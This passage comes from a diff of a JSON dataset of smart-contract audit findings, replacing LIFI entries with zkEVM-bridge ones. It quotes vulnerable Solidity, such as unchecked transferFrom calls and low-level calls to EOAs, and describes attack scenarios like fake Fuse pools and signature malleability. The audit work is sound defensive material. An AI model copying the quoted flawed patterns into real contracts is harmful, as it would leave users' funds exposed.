NAMESPACE = keccak256(\"com.lifi.facets.stargate\"); LibAccess.sol: ACCESS_MANAGEMENT_POSITION = hex\"df...\"; // keccak256(\"com.lifi.library.access.management\") LibDiamond.sol: DIAMOND_STORAGE_POSITION = keccak256(\"diamond.standard.diamond.storage\");", + "title": "Abstract the way to calculate GlobalExitRoot", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The algorithm to combine the mainnetExitRoot and rollupExitRoot is implemented in several locations in the code. This could be abstracted in contract PolygonZkEVMBridge, especially because this will be enhanced when more L2s are added. contract PolygonZkEVMGlobalExitRoot is ... { function updateExitRoot(bytes32 newRoot) external { ... bytes32 newGlobalExitRoot = keccak256(abi.encodePacked(lastMainnetExitRoot, lastRollupExitRoot)); // first ... } function getLastGlobalExitRoot() public view returns (bytes32) { return keccak256(abi.encodePacked(lastMainnetExitRoot, lastRollupExitRoot)); // second } } contract PolygonZkEVMBridge is ... { function _verifyLeaf(..., bytes32 mainnetExitRoot, bytes32 rollupExitRoot, ...) ... { ... uint256 timestampGlobalExitRoot = globalExitRootManager.globalExitRootMap( keccak256(abi.encodePacked(mainnetExitRoot, rollupExitRoot)) ); // third ... } }", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Remove redundant Swapper.sol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "There are two versions of Swapper.sol (e.g. Swapper.sol and SwapperV2.sol) which are functionally more or less the same. The WormholeFacet contract is the only one still using Swapper.sol. Having two versions of the same code is confusing and difficult to maintain. import { Swapper } from \"../Helpers/Swapper.sol\"; contract WormholeFacet is ILiFi, ReentrancyGuard, Swapper { }", + "title": "ETH honeypot on L2", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The initial ETH allocation to the Bridge contract on L2 is rather large: 2E8 ETH on the test network and 1E11 ETH on the production network according to the documentation. This would make the bridge a large honey pot, even more than other bridges. If someone were able to retrieve the ETH they could exchange it with all available other coins on the L2, bridge them back to mainnet, and thus steal nearly all TVL on the L2.", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] - }, - { - "title": "Use additional checks for transferFrom()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Several functions transfer tokens via transferFrom() without checking the return code. Some of the contracts are not covering edge cases like non-standard ERC20 tokens that do not revert on failed transfers. Some ERC20 implementations don't revert if the balance is insufficient but return false. Other functions transfer tokens without checking whether the amount of tokens received is equal to the amount of tokens requested. This is relevant for tokens that withhold a fee. Luckily there is always additional code, like bridge, dex or pool code, that verifies the amount of tokens received, so the risk is limited. contract AxelarFacet { function executeCallWithTokenViaAxelar(... ) ... { ... 
IERC20(tokenAddress).transferFrom(msg.sender, address(this), amount); // no check on return code & amount of tokens ... } } contract ERC20Proxy is Ownable { function transferFrom(...) ... { ... IERC20(tokenAddress).transferFrom(from, to, amount); // no check on return code & amount of tokens ... } } contract FusePoolZap { function zapIn(...) ... { ... IERC20(_supplyToken).transferFrom(msg.sender, address(this), _amount); // no check on return code & amount of tokens } } library LibSwap { function swap(...) ... { ... LibAsset.transferFromERC20(fromAssetId, msg.sender, address(this), toDeposit); // no check on amount of tokens } }", + "title": "Allowance is not required to burn wrapped tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The burn of tokens of the deployed TokenWrapped doesn't use up any allowance, because the Bridge has the right to burn the wrapped token. Normally a user would approve a certain amount of tokens and then do an action (e.g. bridgeAsset()). This could be seen as an extra safety precaution. So you lose the extra safety this way and it might be unexpected from the user's point of view. However, it's also very convenient to do a one-step bridge (comparable to using the permit). Note: most other bridges also do it this way. function burn(address account, uint256 value) external onlyBridge { _burn(account, value); }", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Move code to check amount of tokens transferred to library", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The following piece of code is present in Facet.sol, OptimismBridgeFacet.sol, PolygonBridgeFacet.sol and StargateFacet.sol, to verify all required tokens are indeed transferred. However it doesn't check msg.value == _bridgeData.amount in case a native token is used. The more generic depositAsset() of LibAsset.sol does have this check. uint256 _fromTokenBalance = LibAsset.getOwnBalance(_bridgeData.assetId); LibAsset.transferFromERC20(_bridgeData.assetId, msg.sender, address(this), _bridgeData.amount); if (LibAsset.getOwnBalance(_bridgeData.assetId) - _fromTokenBalance != _bridgeData.amount) { revert InvalidAmount(); }", + "title": "Messages are lost when delivered to EOA by claimMessage()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The function claimMessage() calls the function onMessageReceived() via a low-level call. When the receiving address doesn't contain a contract the low-level call still succeeds and delivers the ETH. The documentation says: \"... IBridgeMessageReceiver interface and such interface must be fulfilled by the receiver contract, it will ensure that the receiver contract has implemented the logic to handle the message.\" As we understood from the project this behavior is intentional. It can be useful to deliver ETH to Externally owned accounts (EOAs), however, the message (which is the main goal of the function) isn't interpreted and thus lost, without any notification. The loss of the delivery of the message to EOAs (i.e. non-contracts) might not be obvious to the casual readers of the code/documentation. function claimMessage(...) ... { ... 
(bool success, ) = destinationAddress.call{value: amount}( abi.encodeCall( IBridgeMessageReceiver.onMessageReceived, (originAddress, originNetwork, metadata) ) ); require(success, \"PolygonZkEVMBridge::claimMessage: Message failed\"); ... }", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Fuse pools are not whitelisted", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Rari Fuse is a permissionless framework for creating and running user-created open interest rate pools with customizable parameters. On the FusePoolZap contract, the correctness of the pool is not checked. Because Fuse is a permissionless framework, an attacker can create a fake pool; through this contract a user can be tricked into the malicious pool. function zapIn( address _pool, address _supplyToken, uint256 _amount ) external {}", + "title": "Replace assembly of _getSelector() with Solidity", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The function _getSelector() gets the first four bytes of a series of bytes and uses assembly. This can also be implemented in Solidity, which is easier to read. function _getSelector(bytes memory _data) private pure returns (bytes4 sig) { assembly { sig := mload(add(_data, 32)) } } function _permit(..., bytes calldata permitData) ... { bytes4 sig = _getSelector(permitData); ... }", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Missing two-step transfer ownership pattern", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The Executor contract is used for arbitrary cross-chain and same-chain execution, swaps and transfers. The Executor contract uses Ownable from OpenZeppelin, which is a simple mechanism to transfer the ownership, not supporting a two-step transfer ownership pattern. OpenZeppelin describes Ownable as: Ownable is a simpler mechanism with a single owner \"role\" that can be assigned to a single account. This simpler mechanism can be useful for quick tests but projects with production concerns are likely to outgrow it. Transferring ownership is a critical operation, and transferring it to an inaccessible wallet or renouncing the ownership, e.g. by mistake, can effectively result in lost functionality.", + "title": "Improvement suggestions for Verifier.sol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "Verifier.sol is a contract automatically generated by snarkjs and is based on the template verifier_groth16.sol.ejs. There are some details that can be improved on this contract. However, changing it will require doing PRs for the Snarkjs project.", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Use low-level call only on contract addresses", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "In the following case, if callTo is an EOA, success will be true. (bool success, ) = callTo.call(callData); The user's intention here will be to do a smart contract call. So if there is no code deployed at callTo, the execution should be reverted. 
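One common way to implement the recommendation above (a sketch under hypothetical names, not LIFI's code) is to revert when the target has no deployed code before performing the low-level call:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

error NoCodeAtAddress(address callTo);

contract Caller {
    function execute(address callTo, bytes calldata callData) external {
        // A low-level call to an EOA always returns success == true,
        // so require deployed code at the target first.
        if (callTo.code.length == 0) revert NoCodeAtAddress(callTo);
        (bool success, ) = callTo.call(callData);
        require(success, "call failed");
    }
}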
Otherwise, users can be under the wrong assumption that their cross-chain call was successful.", + "title": "Variable named incorrectly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "It seems the variable veryBatchTimeTarget was meant to be named verifyBatchTimeTarget, as evidenced by the comment below: // Check if timestamp is above or below the VERIFY_BATCH_TIME_TARGET", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Functions which do not expect ether should be non-payable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "A function which doesn't expect ether should not be marked payable. swapAndStartBridgeTokensViaAmarok() is a payable function, however it reverts when called for the native asset: if (_bridgeData.assetId == address(0)) { revert TokenAddressIsZero(); } So in the case where _bridgeData.assetId != address(0), any ether sent as msg.value is locked in the contract.", + "title": "Add additional comments to function forceBatch()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The function forceBatch() contains a comment about synch attacks. It's not immediately clear what is meant by that. The team explained the following: Getting the call data from an EOA is easy/cheap so there is no need to put the transactions in the event (which is expensive). Getting the internal call data from internal transactions (which is done via a smart contract) is complicated (because it requires an archival node) and then it's worth it to put the transactions in the event, which is easy to query. function forceBatch(...) ... { ... // In order to avoid synch attacks, if the msg.sender is not the origin // Add the transaction bytes in the event if (msg.sender == tx.origin) { emit ForceBatch(lastForceBatch, lastGlobalExitRoot, msg.sender, \"\"); } else { emit ForceBatch(lastForceBatch,lastGlobalExitRoot,msg.sender,transactions); } }", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Incompatible contract used in the WormholeFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "During the code review, it has been observed that all other facets are using the SwapperV2 contract. However, the WormholeFacet is still using the Swapper contract. With the recent change on the SwapperV2, leftovers can be sent to a specific receiver. By using the old contract, this capability will be lost in the related facet. Also, the LiFi Team claims that the Swapper contract will be deprecated. ... import { Swapper } from \"../Helpers/Swapper.sol\"; /// @title Wormhole Facet /// @author [LI.FI](https://li.fi) /// @notice Provides functionality for bridging through Wormhole contract WormholeFacet is ILiFi, ReentrancyGuard, Swapper { ...", + "title": "Check against MAX_VERIFY_BATCHES", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "In several functions a comparison is made with < MAX_VERIFY_BATCHES. This should probably be <= MAX_VERIFY_BATCHES, otherwise the MAX will never be reached. uint64 public constant MAX_VERIFY_BATCHES = 1000; function sequenceForceBatches(ForcedBatchData[] memory batches) ... { uint256 batchesNum = batches.length; ... 
require(batchesNum < MAX_VERIFY_BATCHES, ... ); ... } function sequenceBatches(BatchData[] memory batches) ... { uint256 batchesNum = batches.length; ... require(batchesNum < MAX_VERIFY_BATCHES, ...); ... } function verifyBatches(...) ... { ... require(finalNewBatch - initNumBatch < MAX_VERIFY_BATCHES, ... ); ... }", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Solidity version bump to latest", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "During the review the newest version of Solidity was released with important bug fixes.", + "title": "Prepare for multiple aggregators/sequencers to improve availability", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "As long as there is one (trusted) sequencer and one (trusted) aggregator, the availability risks are relatively high. However, the current code isn't optimized to support multiple trusted sequencers and multiple trusted aggregators. modifier onlyTrustedSequencer() { require(trustedSequencer == msg.sender, ... ); _; } modifier onlyTrustedAggregator() { require(trustedAggregator == msg.sender, ... ); _; }", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Bridge with AmarokFacet can fail due to hardcoded variables", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "During the code review, it has been observed that callbackFee and relayerFee are set to 0. However, Connext mentioned that it's set to 0 on the testnet. On the mainnet, these variables can be edited by Connext and AmarokFacet bridge operations can fail. ... IConnextHandler.XCallArgs memory xcallArgs = IConnextHandler.XCallArgs({ params: IConnextHandler.CallParams({ to: _bridgeData.receiver, callData: _bridgeData.callData, originDomain: _bridgeData.srcChainDomain, destinationDomain: _bridgeData.dstChainDomain, agent: _bridgeData.receiver, recovery: msg.sender, forceSlow: false, receiveLocal: false, callback: address(0), callbackFee: 0, // fee paid to relayers; relayers don't take any fees on testnet relayerFee: 0, // fee paid to relayers; relayers don't take any fees on testnet slippageTol: _bridgeData.slippageTol }), transactingAssetId: _bridgeData.assetId, amount: _amount }); ...", + "title": "Temporary Fund freeze on using Multiple Rollups", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "Claiming of assets will freeze temporarily if multiple rollups are involved as shown below. The asset will be lost if the transfer is done between: a. Mainnet -> R1 -> R2 b. R1 -> R2 -> Mainnet 1. USDC is bridged from Mainnet to Rollup R1 with its metadata. 2. User claims this and a new Wrapped token is prepared using the USDC token and its metadata. bytes32 tokenInfoHash = keccak256(abi.encodePacked(originNetwork, originTokenAddress)); TokenWrapped newWrappedToken = (new TokenWrapped){salt: tokenInfoHash}(name, symbol, decimals); 3. Let's say the user bridges this token to Rollup R2. 
This will burn the wrapped token on R1: if (tokenInfo.originTokenAddress != address(0)) { // The token is a wrapped token from another network // Burn tokens TokenWrapped(token).burn(msg.sender, amount); originTokenAddress = tokenInfo.originTokenAddress; originNetwork = tokenInfo.originNetwork; } 4. The problem here is that while bridging, the metadata was not set. 5. So once the user claims this on R2, wrapped token creation will fail since abi.decode on empty metadata will fail to retrieve name, symbol,... The asset will be temporarily lost since it was bridged properly but cannot be claimed. Showing the transaction chain: Mainnet bridgeAsset(usdc,R1,0xUser1, 100, ) Transfer 100 USDC to Mainnet M1 originTokenAddress=USDC originNetwork = Mainnet metadata = (USDC,USDC,6) Deposit node created R1 claimAsset(...,Mainnet,USDC,R1,0xUser1,100, metadata = (USDC,USDC,6)) Claim verified Marked claimed tokenInfoHash derived from originNetwork, originTokenAddress which is Mainnet, USDC tokenInfoToWrappedToken[Mainnet,USDC] created using metadata = (USDC,USDC,6) User minted 100 amount of tokenInfoToWrappedToken[Mainnet, USDC] bridgeAsset(tokenInfoToWrappedToken[Mainnet,USDC],R2,0xUser2, 100, ) Burn 100 tokenInfoToWrappedToken[Mainnet,USDC] originTokenAddress=USDC originNetwork = Mainnet metadata = \"\" Deposit node created with empty metadata R2 claimAsset(...,Mainnet,USDC,R2,0xUser2,100, metadata = \"\") Claim verified Marked claimed tokenInfoHash derived from originNetwork, originTokenAddress which is Mainnet, USDC Since metadata = \"\", abi.decode fails", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Store _dexs[i] into a temp variable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The DexManagerFacet can store _dexs[i] into a temporary variable to save some gas. function batchAddDex(address[] calldata _dexs) external { if (msg.sender != LibDiamond.contractOwner()) { LibAccess.enforceAccessControl(); } mapping(address => bool) storage dexAllowlist = appStorage.dexAllowlist; uint256 length = _dexs.length; for (uint256 i = 0; i < length; i++) { _checkAddress(_dexs[i]); if (dexAllowlist[_dexs[i]]) continue; dexAllowlist[_dexs[i]] = true; appStorage.dexs.push(_dexs[i]); emit DexAdded(_dexs[i]); } }", + "title": "Off by one error when comparing with MAX_TRANSACTIONS_BYTE_LENGTH constant", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "When comparing against MAX_TRANSACTIONS_BYTE_LENGTH, the valid range should be <= instead of <. require( transactions.length < MAX_TRANSACTIONS_BYTE_LENGTH, \"PolygonZkEVM::forceBatch: Transactions bytes overflow\" ); require( currentBatch.transactions.length < MAX_TRANSACTIONS_BYTE_LENGTH, \"PolygonZkEVM::sequenceBatches: Transactions bytes overflow\" );", "labels": [ "Spearbit", - "LIFI", - "Severity: Gas Optimization" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Optimize array length in for loop", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "In a for loop the length of an array can be put in a temporary variable to save some gas. This has been done already in several other locations in the code. function swapAndStartBridgeTokensViaStargate(...) ... { ... for (uint8 i = 0; i < _swapData.length; i++) { ... } ... 
}", + "title": "trustedAggregatorTimeout value may impact batchFees", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "If trustedAggregatorTimeout and veryBatchTimeTarget are valued nearby then all batches veri- ed by 3rd party will be above target (totalBatchesAboveTarget) and this would impact batch fees. 1. Lets say veryBatchTimeTarget is 30 min and trustedAggregatorTimeout is 31 min. 2. Now anyone can call verifyBatches only after 31 min due to the below condition. 37 require( ); sequencedBatches[finalNewBatch].sequencedTimestamp + trustedAggregatorTimeout <= block.timestamp, \"PolygonZkEVM::verifyBatches: Trusted aggregator timeout not expired\" 3. This means _updateBatchFee can at minimum be called after 31 min of sequencing by a nontrusted aggre- gator. 4. The below condition then always returns true. if ( // 31>30 ) { block.timestamp - currentSequencedBatchData.sequencedTimestamp >veryBatchTimeTarget", "labels": [ "Spearbit", - "LIFI", - "Severity: Gas Optimization" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "StargateFacet can be optimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "It might be cheaper to call getTokenFromPoolId in a constructor and store in immutable variables (especially because there are not that many pool, currently max 3 per chain pool-ids ) On the other hand, It requires an update of the facet when new pools are added though. function getTokenFromPoolId(address _router, uint256 _poolId) private view returns (address) { address factory = IStargateRouter(_router).factory(); address pool = IFactory(factory).getPool(_poolId); return IPool(pool).token(); } For the srcPoolId it would be possible to replace this with a token address in the calling interface and lookup the poolid. However, for dstPoolId this would be more difficult, unless you restrict it to the case where srcPoolId == dstPoolId e.g. the same asset is received on the destination chain. This seems a logical restriction. The advantage of not having to specify the poolids is that you abstract the interface from the caller and make the function calls more similar.", + "title": "Largest allowed batch fee multiplier is 1023 instead of 1024", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "Per the setMultiplierBatchFee function, the largest allowed batch fee multiplier is 1023. /** * @notice Allow the admin to set a new multiplier batch fee * @param newMultiplierBatchFee multiplier bathc fee */ function setMultiplierBatchFee( uint16 newMultiplierBatchFee ) public onlyAdmin { require( newMultiplierBatchFee >= 1000 && newMultiplierBatchFee < 1024, \"PolygonZkEVM::setMultiplierBatchFee: newMultiplierBatchFee incorrect range\" ); multiplierBatchFee = newMultiplierBatchFee; emit SetMultiplierBatchFee(newMultiplierBatchFee); } However, the comment mentioned that the largest allowed is 1024. // Batch fee multiplier with 3 decimals that goes from 1000 - 1024 uint16 public multiplierBatchFee;", "labels": [ "Spearbit", - "LIFI", - "Severity: Gas Optimization" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Use block.chainid for chain ID verification in HopFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "HopFacet.sol uses user provided _hopData.fromChainId to identify current chain ID. 
The call to the Hop Bridge will revert if it does not match block.chainid, so this is still secure. However, as a gas optimization, this parameter can be removed from the HopData struct, and its usage can be replaced by block.chainid.", + "title": "Deposit token associated Risk Awareness", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The deposited tokens locked in L1 could be at risk due to external conditions like the one shown below: 1. Assume there is a huge amount of token X being bridged to a rollup. 2. Now mainnet will have a huge balance of token X. 3. Unfortunately due to a hack or LUNA-like condition, the project owner takes a snapshot of the current token X balance for each user address and later all these addresses will be airdropped with a new token based on the snapshot value. 4. In this case, token X in mainnet will be snapshotted but at disbursal time the newly updated token will be airdropped to mainnet and not the user. 5. Now there is no emergencywithdraw method to get these airdropped funds out. 6. For the users, if they claim funds they still get token X which is worthless.", "labels": [ "Spearbit", - "LIFI", - "Severity: Gas Optimization" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Rename event InvalidAmount(uint256) to ZeroAmount()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "event InvalidAmount(uint256) is emitted only with an argument of 0: if (_amount <= 0) { revert InvalidAmount(_amount); } ... if (msg.value <= 0) { revert InvalidAmount(msg.value); } Since amount and msg.value can only be non-negative, these if conditions succeed only when these values are 0. Hence, only InvalidAmount(0) is ever emitted.", + "title": "Fees might get stuck when Aggregator is unable to verify", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The collected fees from the Sequencer will be stuck in the contract if the Aggregator is unable to verify the batch. In this case, the Aggregator will not be paid and the batch transaction fee will get stuck in the contract.", "labels": [ "Spearbit", - "LIFI", - "Severity: Gas Optimization" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Use custom errors instead of strings", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "To save some gas the use of custom errors leads to cheaper deploy time cost and run time cost. The run time cost is only relevant when the revert condition is met.", + "title": "Consider using OpenZeppelin's ECDSA library over ecrecover", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "As stated here, ecrecover is vulnerable to a signature malleability attack. 
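A sketch of the suggested switch from raw ecrecover to OpenZeppelin's ECDSA library, which rejects malleable (high-s) signatures and a zero recovered address; contract and function names here are hypothetical:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

import "@openzeppelin/contracts/utils/cryptography/ECDSA.sol";

contract PermitVerifier {
    using ECDSA for bytes32;

    function checkSigner(bytes32 digest, bytes memory signature, address expected) internal pure {
        // ECDSA.recover reverts on malleable signatures and on recovery to
        // address(0), replacing the manual checks around a raw ecrecover
        address signer = digest.recover(signature);
        require(signer == expected, "invalid signer");
    }
}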
While the code in permit is not vulnerable since a nonce is used in the signed data, I'd still recommend using OpenZeppelin's ECDSA library, as it does the malleability safety check for you as well as the signer != address(0) check done on the next line.", "labels": [ "Spearbit", - "LIFI", - "Severity: Gas Optimization" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Use calldata over memory", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "When a function with a memory array is called externally, the abi.decode() step has to use a for-loop to copy each index of the calldata to the memory index. Each iteration of this for-loop costs at least 60 gas (i.e. 60 * .length). Using calldata directly obviates the need for such a loop in the contract code and runtime execution. If the array is passed to an internal function which passes the array to another internal function where the array is modified and therefore memory is used in the external call, it's still more gas-efficient to use calldata when the external function uses modifiers, since the modifiers may prevent the internal functions from being called. Some gas savings if function arguments are passed as calldata instead of memory.", + "title": "Risk of transactions not yet in Consolidated state on L2", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "There is a relatively long period during which batches, and thus transactions, are between the Trusted state and the Consolidated state. Normally around 30 minutes, but in exceptional situations up to 2 weeks. On the L2, users normally interact with the Trusted state. However, they should be aware of the risk for high-value transactions (especially for transactions that can't be undone, like transactions that have an effect outside of the L2, like off ramps, OTC transactions, alternative bridges, etc). There will be custom RPC endpoints that can be used to retrieve status information, see zkevm.go.", "labels": [ "Spearbit", - "LIFI", - "Severity: Gas Optimization" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Avoid reading from storage when possible", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Functions which can only be called by the contract's owner can use msg.sender instead of reading the owner's address after the ownership check is done. In all the cases below, the ownership check is already done, so it is guaranteed that owner == msg.sender. LibAsset.transferAsset(tokenAddress, payable(owner), balance); ... LibAsset.transferAsset(tokenAddresses[i], payable(owner), balance); ... if (_newOwner == owner) revert NewOwnerMustNotBeSelf(); owner is a state variable, so reading it has significant gas costs. This can be avoided here by using msg.sender instead.", + "title": "Delay of bridging from L2 to L1", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The bridge uses the Consolidated state while bridging from L2 to L1, and the user interface, public.zkevm-test.net, shows \"Waiting for validity proof. It can take between 15 min and 1 hour.\". Other 
(optimistic) bridges use liquidity providers who take the risk and allow users to retrieve funds in a shorter amount of time (for a fee).", "labels": [ "Spearbit", - "LIFI", - "Severity: Gas Optimization" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Increment for loop variable in an unchecked block", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "(This is only relevant if you are using the default Solidity checked arithmetic.) i++ involves checked arithmetic, which is not required. This is because the value of i is always strictly less than length <= 2**256 - 1. Therefore, the theoretical maximum value of i to enter the for-loop body is 2**256 - 2. This means that the i++ in the for loop can never overflow. Regardless, the overflow checks are performed by the compiler. Unfortunately, the Solidity optimizer is not smart enough to detect this and remove the checks. One can manually do this by: for (uint i = 0; i < length; ) { // do something that doesn't change the value of i unchecked { ++i; } }", + "title": "Missing Natspec documentation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "Some NatSpec comments are either missing or are incomplete. Missing NatSpec comment for pendingStateNum: /** * @notice Verify batches internal function * @param initNumBatch Batch which the aggregator starts the verification * @param finalNewBatch Last batch aggregator intends to verify * @param newLocalExitRoot New local exit root once the batch is processed * @param newStateRoot New State root once the batch is processed * @param proofA zk-snark input * @param proofB zk-snark input * @param proofC zk-snark input */ function _verifyBatches( uint64 pendingStateNum, uint64 initNumBatch, uint64 finalNewBatch, bytes32 newLocalExitRoot, bytes32 newStateRoot, uint256[2] calldata proofA, uint256[2][2] calldata proofB, uint256[2] calldata proofC ) internal { Missing NatSpec comment for pendingStateTimeout: /** * @notice Struct to call initialize, this basically saves gas becasue pack the parameters that can be packed * and avoid stack too deep errors. * @param admin Admin address * @param chainID L2 chainID * @param trustedSequencer Trusted sequencer address * @param forceBatchAllowed Indicates wheather the force batch functionality is available * @param trustedAggregator Trusted aggregator * @param trustedAggregatorTimeout Trusted aggregator timeout */ struct InitializePackedParameters { address admin; uint64 chainID; address trustedSequencer; uint64 pendingStateTimeout; bool forceBatchAllowed; address trustedAggregator; uint64 trustedAggregatorTimeout; }", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Executor should consider pre-deployed contract behaviors", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The Executor contract allows users to do arbitrary calls. This allows users to trigger pre-deployed contracts (which are used on specific chains). Since the behaviors of pre-deployed contracts differ, dapps on different EVM-compatible chains would have different security assumptions. Please refer to the Avax bug fix. Native-asset-call-deprecation Were the native asset call not deprecated, exploiters could bypass the check and trigger ERC20Proxy through the pre-deployed contract. 
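The unchecked-increment pattern from the finding above, expanded into a compilable sketch (hypothetical function, not taken from the audited code):

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

contract UncheckedLoop {
    function sum(uint256[] calldata values) external pure returns (uint256 total) {
        uint256 length = values.length;
        for (uint256 i = 0; i < length; ) {
            total += values[i];
            // i < length <= 2**256 - 1, so ++i cannot overflow;
            // skipping the compiler's overflow check saves gas
            unchecked {
                ++i;
            }
        }
    }
}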
